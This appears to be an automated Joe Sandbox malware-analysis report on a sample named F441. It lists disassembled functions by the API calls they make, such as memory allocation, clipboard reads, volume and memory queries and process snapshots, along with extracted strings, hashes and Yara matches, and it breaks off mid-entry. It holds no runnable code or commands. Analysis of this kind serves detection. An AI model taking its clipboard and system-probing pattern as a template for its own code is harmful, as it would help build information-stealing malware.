                                                                                • Instruction Fuzzy Hash: 4CE1B1B2A083449BD714CF28D88175B7BE5ABD4314F14853EFA95AB3C1D778E904CB8A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: ]hiX$gdeb
                                                                                • API String ID: 2994545307-4273025081
                                                                                • Opcode ID: 47f912e6e107acd04104a0d7df21dcaa4962048d756623bbe4edb9e7d625802a
                                                                                • Instruction ID: 336b67656a256fc3d7c49e2fee8c29aa2d9fc5d5d61a2c4a19b8c8911d00a2fb
                                                                                • Opcode Fuzzy Hash: 47f912e6e107acd04104a0d7df21dcaa4962048d756623bbe4edb9e7d625802a
                                                                                • Instruction Fuzzy Hash: B6C1E3B17083118FD714CF15D89172BBBE1EBD5318FA48A2EE4959B382D738D845CB8A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: IO
                                                                                • API String ID: 0-3981347273
                                                                                • Opcode ID: 29fb27968318ae9cb900c6618a64d07fe03029c203b194ad627e1d93fc6363e6
                                                                                • Instruction ID: 51fd4917a3c3351c2bbf2a3dc6b6b13a62bcc2487d4881d1c48f1649ea521d72
                                                                                • Opcode Fuzzy Hash: 29fb27968318ae9cb900c6618a64d07fe03029c203b194ad627e1d93fc6363e6
                                                                                • Instruction Fuzzy Hash: 94D132B1200B018BD724CF15C590B52BBF2FF4A704F158A9DD89A8FB56D739E985CB88
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a5d886a9cf1d364aeba75cbb5fbc2a0112e377b092f9423ae5a3a5703b18e045
                                                                                • Instruction ID: 02b8bb6e56041378f4f9f2711353cce18edc58b923ed8b10765db063976cd2a1
                                                                                • Opcode Fuzzy Hash: a5d886a9cf1d364aeba75cbb5fbc2a0112e377b092f9423ae5a3a5703b18e045
                                                                                • Instruction Fuzzy Hash: EA41BD745083528BC724CF14C8617ABB7E1FF89358F054A1DE9DA9B381E7389985CB8A
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6267cfd9be4afba129147b6b4996751238124f7394fccf3144a8ff5b67e9c5bc
                                                                                • Instruction ID: 151cf318142fe4857ebf8dfdf36c3425f9736b69a2a980a3f824acb8caea4c7c
                                                                                • Opcode Fuzzy Hash: 6267cfd9be4afba129147b6b4996751238124f7394fccf3144a8ff5b67e9c5bc
                                                                                • Instruction Fuzzy Hash: 36F039B45093418FC320EF25D55474ABBE1ABD8304F01882DE489C7391DBB99858CF86

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 020F024D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID: cess$kernel32.dll
                                                                                • API String ID: 4275171209-1230238691
                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction ID: fd96abfbcbc1ba3c88088248ade3727876ff70d63f7c93e0f6d1ce76c48a2d52
                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction Fuzzy Hash: 54526A74A01229DFDBA4CF58C984BACBBB1BF09304F1480D9E54DAB756DB30AA85DF14

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041D0A0
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041D0CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: K-K/$U5U7$\1B3
                                                                                • API String ID: 237503144-1235027928
                                                                                • Opcode ID: c674b7651ea3e55e9227b54ef7b57f94361ab8414c6d31006c9343337da9bb58
                                                                                • Instruction ID: 085b80d8ebaf4cdc089f22804327f41de0cf31be30b47905784d4d41386d2044
                                                                                • Opcode Fuzzy Hash: c674b7651ea3e55e9227b54ef7b57f94361ab8414c6d31006c9343337da9bb58
                                                                                • Instruction Fuzzy Hash: F76177B56083518FD324CF14C8A0BABB7E1EF8A308F054A1DE8E65B381D7749945CBA7

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0041DA0A
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0041DA3A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: eI.K$qs
                                                                                • API String ID: 237503144-3936219367
                                                                                • Opcode ID: 85c26f031341337586e1b5fec7c34aa25b76f3d64f86288b9f1c02943ea52ba5
                                                                                • Instruction ID: 3ad400ec4d5e0868339db15895de8c0dbb191545bfc635c07005ecffac5dc4ed
                                                                                • Opcode Fuzzy Hash: 85c26f031341337586e1b5fec7c34aa25b76f3d64f86288b9f1c02943ea52ba5
                                                                                • Instruction Fuzzy Hash: 915154B0100B009BD724CF26C890BA7BBB5FF46314F544A1CE8A64BB89D774F549CB98

                                                                                Control-flow Graph

                                                                                control_flow_graph 563 408ea0-408ead call 436950 566 408eb1-408eb8 call 431710 563->566 567 408eaf 563->567 571 408eba 566->571 572 408ebc-408ef7 GetStdHandle GetConsoleWindow call 408f20 call 40a390 566->572 569 408f0b-408f14 ExitProcess 567->569 573 408f04-408f09 call 4371d0 571->573 580 408ef9 572->580 581 408efb call 40f5b0 572->581 573->569 582 408f02 580->582 584 408f00 581->584 582->573 584->582
                                                                                APIs
                                                                                Strings
                                                                                • of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in, xrefs: 00408EDE
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID: of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in
                                                                                • API String ID: 621844428-2804141084
                                                                                • Opcode ID: d3fc2cdc024533b6e08ef3c83f20ae28995cdbdfa2716207c1ee4e745a0791f4
                                                                                • Instruction ID: 4cc74d5fb66ad9159a78e8348017eb50dff1af742bc963a264908d0417922e34
                                                                                • Opcode Fuzzy Hash: d3fc2cdc024533b6e08ef3c83f20ae28995cdbdfa2716207c1ee4e745a0791f4
                                                                                • Instruction Fuzzy Hash: A5F0FFB0408202CEC750BF72D70626A7BA5AF64364F10593FEAD5A12D1EE3C84459E5F

                                                                                Control-flow Graph

                                                                                control_flow_graph 585 4337fd-43385d call 439500 GetVolumeInformationW
                                                                                APIs
                                                                                • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00433840
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: InformationVolume
                                                                                • String ID: :$C$\
                                                                                • API String ID: 2039140958-3809124531
                                                                                • Opcode ID: cbbe94e1d607de42a8e897c5ed6c7dfebdb6e6a87b75144c6ad5122602fa5c3d
                                                                                • Instruction ID: 1368c0940c647f4f39a91e564e44146e6a68535283266bc39cb5798660f285bc
                                                                                • Opcode Fuzzy Hash: cbbe94e1d607de42a8e897c5ed6c7dfebdb6e6a87b75144c6ad5122602fa5c3d
                                                                                • Instruction Fuzzy Hash: 44F06575294701B7E718DF10EC56F1A32E0EB81B44F10482DB245AA1D0D7F5AA19DA5E
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: AllocString
                                                                                • String ID: *$,
                                                                                • API String ID: 2525500382-162240353
                                                                                • Opcode ID: 6f887dd92c1e7d051b441eb50b8ce683dfa68637c71dffcb6e4b95598e80c62e
                                                                                • Instruction ID: 8755544d7d26afcd6c5da590c34bf048d679cfec69adbb61e5b4e032c319a10d
                                                                                • Opcode Fuzzy Hash: 6f887dd92c1e7d051b441eb50b8ce683dfa68637c71dffcb6e4b95598e80c62e
                                                                                • Instruction Fuzzy Hash: 2641C27450D7C18ED371CB28845C78BBFE0AB9A324F148A4DE0E94B2E2CB74510ADB97
                                                                                APIs
                                                                                • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042893E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: InstalledMemoryPhysicallySystem
                                                                                • String ID: sflQ
                                                                                • API String ID: 3960555810-3249545781
                                                                                • Opcode ID: 8302543d336a64d61fbfd091ffaf374d6ea3bc29c3405159477e15a25cf067dc
                                                                                • Instruction ID: ceaf3b536834eb6ea101402e43ebfa27eafed5b2e0152b17aac62569a04a8eaf
                                                                                • Opcode Fuzzy Hash: 8302543d336a64d61fbfd091ffaf374d6ea3bc29c3405159477e15a25cf067dc
                                                                                • Instruction Fuzzy Hash: 42E16F70205B918AD7258F39C4A47E7BBE1BF16305F98499EC0EB8B382DB396409CB55
                                                                                APIs
                                                                                • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042893E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: InstalledMemoryPhysicallySystem
                                                                                • String ID: sflQ
                                                                                • API String ID: 3960555810-3249545781
                                                                                • Opcode ID: eda0b82203ec5fd52a02e42ad8bc985fa3b6130ce1cc9c57a209a743f85e5ba8
                                                                                • Instruction ID: 4579460111167dd6f514478598ab714a340966e7b3f1678d87b811800d9ff980
                                                                                • Opcode Fuzzy Hash: eda0b82203ec5fd52a02e42ad8bc985fa3b6130ce1cc9c57a209a743f85e5ba8
                                                                                • Instruction Fuzzy Hash: A7C17F70205B918AD725CF35C4A07E7BBE1BF16304F98495ED0EB8B382DB796409CB55
                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004355C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID: \-"#
                                                                                • API String ID: 3298025750-2514456039
                                                                                • Opcode ID: 859eba75cc14126060daa5553d4e99eea4a1c63d27fd1e683f7c5ac40af54193
                                                                                • Instruction ID: 4e5805d71c6b113a9038e1d4705d07e5b3b04c5f079926af7e5af699945cb8d6
                                                                                • Opcode Fuzzy Hash: 859eba75cc14126060daa5553d4e99eea4a1c63d27fd1e683f7c5ac40af54193
                                                                                • Instruction Fuzzy Hash: 5A1151716083019FD708CF50D8A475FFBE2FBC4328F148A1DE4A917691C3B99909CB86
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00414EFA
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00414F28
                                                                                  • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings$AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 3432729115-0
                                                                                • Opcode ID: c009db615c638526771df0e05fb3056c90e96922816314dcb6ffecc14510497f
                                                                                • Instruction ID: 3bef7b545c1fe862b70271ecfb8295d17d8257d1e606da934cadffb5b9659bed
                                                                                • Opcode Fuzzy Hash: c009db615c638526771df0e05fb3056c90e96922816314dcb6ffecc14510497f
                                                                                • Instruction Fuzzy Hash: C351E0B41043018BD324CF14C891BABBBE5FFC5718F048A1DF9A69B391EB789941CB96
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00417A6A
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00417A98
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID:
                                                                                • API String ID: 237503144-0
                                                                                • Opcode ID: 76c95b86170c2d249fc8a0b579228b811743fa26dcd10391b77df605b8ccdfce
                                                                                • Instruction ID: 9d185849e125c65ed9e76077d369fe8678050950fd45e526c791e55ee9a7ec59
                                                                                • Opcode Fuzzy Hash: 76c95b86170c2d249fc8a0b579228b811743fa26dcd10391b77df605b8ccdfce
                                                                                • Instruction Fuzzy Hash: 0F01D2755482047FD310AB25CC86F67776CEB86764F044619F9668B2D1EB30A908C6B6
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 004FF466
                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 004FF486
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557763038.00000000004FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 004FE000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_4fe000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 3833638111-0
                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                • Instruction ID: e44316986de41af896239358f6215100e2f3ee6432ea990fab01f99cbd048f2e
                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                • Instruction Fuzzy Hash: CFF068321007147BD7203AF5988DB7B76E8AF55724F104539E746915C0DB78EC494A55
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,020F0223,?,?), ref: 020F0E19
                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,020F0223,?,?), ref: 020F0E1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction ID: 373609c7fd307ef06685ff80add0f5f843e46d53b934b4a801672e3e55fe8bac
                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction Fuzzy Hash: C6D01231545228B7D7412A94DC09BCD7B5CDF05B66F008011FB0DD9481C770954046E5
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: dc9adec9b8184aaf73981e838b522b6d47d30a6e16419426b755bca3264c8062
                                                                                • Instruction ID: 50cfc2c49a3083e08c64fd866987bc454676edab02516c1ee8da21e686402dde
                                                                                • Opcode Fuzzy Hash: dc9adec9b8184aaf73981e838b522b6d47d30a6e16419426b755bca3264c8062
                                                                                • Instruction Fuzzy Hash: 4821D2B4501A02AFE715DF25D8D1A2ABBB2FB86305F10C23EC85647B15DB38A455CFD8
                                                                                APIs
                                                                                • RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 004372ED
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: ad23319594c346ecf424d56c5213ed755dd05cb4f309e994e67b51aad4c8c90e
                                                                                • Instruction ID: d108b6c160ddb040137915c382c094585e6d719fb6ca8c5299172bcdf25914e1
                                                                                • Opcode Fuzzy Hash: ad23319594c346ecf424d56c5213ed755dd05cb4f309e994e67b51aad4c8c90e
                                                                                • Instruction Fuzzy Hash: 131113751083409FD700CF04D49470BB7A2EFC5318F65CA5CE8A81B25AC379A90ACB9A
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 79dca1b32247aa9b70ad2c1bcd7dcd008df1434939f9a33d85ef6ce44ca53825
                                                                                • Instruction ID: 3dda7e75f36cf504926de81a89fda72ed932754256e5c243a5fe3c5ff6ff8171
                                                                                • Opcode Fuzzy Hash: 79dca1b32247aa9b70ad2c1bcd7dcd008df1434939f9a33d85ef6ce44ca53825
                                                                                • Instruction Fuzzy Hash: 731125705083009FD708CF10C46476BBBA1EB85328F108A1DE8A917681C379DA09CBC6
                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(0043A22C,005C003F,00000006,00120089,?,00000018,' !",00000000,004150CA), ref: 00437406
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                                                                                • Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
                                                                                • Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                                                                                • Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 004FF14E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557763038.00000000004FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 004FE000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_4fe000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                • Instruction ID: 6f41d0cc6c19e623228ae3962396f0b535939b3bd55c148d5ab48ad6783b9761
                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                • Instruction Fuzzy Hash: 78112079A00208FFDB01DF98CA85E99BBF5AF08750F0580A5F9489B361D375EA50DF44
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$Global$CloseDataInfoLockOpenUnlockWindow
                                                                                • String ID: @$A$C$F
                                                                                • API String ID: 3829817484-319984173
                                                                                • Opcode ID: 8ad0d9297b1ef162b2248c3ebd06f01706d8c7b0091a801e9c92d9469685e51b
                                                                                • Instruction ID: 15be754739b74540689589334df2f87df7105b9426ed1557cb94c4d1065241c1
                                                                                • Opcode Fuzzy Hash: 8ad0d9297b1ef162b2248c3ebd06f01706d8c7b0091a801e9c92d9469685e51b
                                                                                • Instruction Fuzzy Hash: 9B513D7060C391CFD300DF6AA48875FBFE0AB96364F940A6EF4D58A291C738954A8B57
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !I$O$*M*S$-E>K$B5E;$I-@3$L9_?$W=WC$[)M/
                                                                                • API String ID: 0-4068174152
                                                                                • Opcode ID: fff0af72006f123bcc6fc661a3252df57c55cfd64bb4fe08b2f90c9271b5dd27
                                                                                • Instruction ID: 4f28b425dee0eaebfec0217185637ff8e30ff15b97cf0671f566130dd3d76823
                                                                                • Opcode Fuzzy Hash: fff0af72006f123bcc6fc661a3252df57c55cfd64bb4fe08b2f90c9271b5dd27
                                                                                • Instruction Fuzzy Hash: 06C169B1640A018BD728CF14C4A1766F7B2FF56318F19865CC8A64BBD1E7B5F852CB90
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !I$O$*M*S$-E>K$B5E;$I-@3$L9_?$W=WC$[)M/
                                                                                • API String ID: 0-4068174152
                                                                                • Opcode ID: 0a8ceca14b6d57825b30a63cf70770cde9fe89ef20bcca57d177dbff602c7479
                                                                                • Instruction ID: c5e2fc403fb0cec226c3ddd8a9dc625652c1aa2ba632ddc363c6cf4a8812eb13
                                                                                • Opcode Fuzzy Hash: 0a8ceca14b6d57825b30a63cf70770cde9fe89ef20bcca57d177dbff602c7479
                                                                                • Instruction Fuzzy Hash: CBC1AAB1104B018BD328CF14C5A1B63B7B2FF56318F28865DC8A64BB91E779F891CB94
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID: "$"(B$0$5Q$B(B$P%B$b%B
                                                                                • API String ID: 1279760036-2560538612
                                                                                • Opcode ID: 3b9de29d937a85441e7a85420de6bba4d0615bab3f6ee0a5bf3cd202b46f7243
                                                                                • Instruction ID: ae90b01d8c300a32a6ec655623065aa85ae112dbe4b9f4c81515b6d4964649e2
                                                                                • Opcode Fuzzy Hash: 3b9de29d937a85441e7a85420de6bba4d0615bab3f6ee0a5bf3cd202b46f7243
                                                                                • Instruction Fuzzy Hash: 851266316083909FD324CF28D85076ABBE2AFC6324F59866EE4958B3E1C779CD45CB46
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_20f0000_F441.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
